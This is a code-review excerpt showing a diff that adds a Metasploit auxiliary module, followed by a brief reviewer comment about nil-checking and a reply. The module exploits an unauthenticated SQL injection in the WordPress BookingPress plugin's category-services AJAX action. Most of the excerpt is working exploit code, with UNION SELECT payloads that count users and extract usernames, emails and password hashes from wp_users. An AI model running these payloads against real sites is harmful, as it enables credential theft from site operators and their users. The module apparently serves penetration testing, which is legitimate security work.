modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb

```diff
@@ -0,0 +1,148 @@
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('BOOKING_PRESS_PAGE', [ true, 'The webpage that bookingPress is running on', '/bookingpress/' ])
+    ])
+  end
+
+  def check
+    @nonce = get_user_nonce
+    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/wp-admin/admin-ajax.php'),
+      'vars_post' =>
+                                generate_vars_post(') UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -')
+    })
+
+    return Exploit::CheckCode::Vulnerable if res&.code == 200 && res.body.include?('bookingpress_service_position')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_number_of_users
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/wp-admin/admin-ajax.php'),
+      'vars_post' =>
+                               generate_vars_post(') UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -')
+    })
+
+    number_of_users = JSON.parse(res&.body)[0]['bookingpress_service_position'].to_i
+    fail_with(Failure::UnexpectedReply, 'Unable to extract the number of users from the database') unless number_of_users.is_a? Integer
+
+    number_of_users
+  end
+
+  def generate_vars_post(sqli)
+    {
+      'action' => 'bookingpress_front_get_category_services', # vulnerable action,
+      '_wpnonce' => @nonce,
+      'category_id' => 1,
+      'total_service' => "#{rand(100..10000)}#{sqli}"
+    }
+  end
+
+  def get_user_nonce
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, datastore['BOOKING_PRESS_PAGE'])
+    })
+
+    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
+
+    ::Regexp.last_match(1)
+  end
+
+  def run
+    @nonce ||= get_user_nonce
+    fail_with(Failure::UnexpectedReply, 'Unable to get wp-nonce for an unauthenticated user') if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+    number_of_users = get_number_of_users
+    print_status("Found #{number_of_users} users in the database")
+    i = 0
+
+    creds_table = Rex::Text::Table.new(
+      'Header' => 'Wordpress User Credentials',
+      'Indent' => 1,
+      'Columns' => ['Username', 'Email', 'Hash']
+    )
+
+    print_status('Extracting credential information')
+    while i < number_of_users
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, '/wp-admin/admin-ajax.php'),
+        'vars_post' => generate_vars_post(") UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset #{i}-- -")
+      })
+
+      fail_with(Failure::UnexpectedReply, 'Unable to retrieve JSON response from SQL injection') unless JSON.parse(res&.body)[0].is_a? Hash
```

Comment:
I'd suggest checking that `res` is not nil here before parsing the response.

Reply:
Resolved with updated checking logic.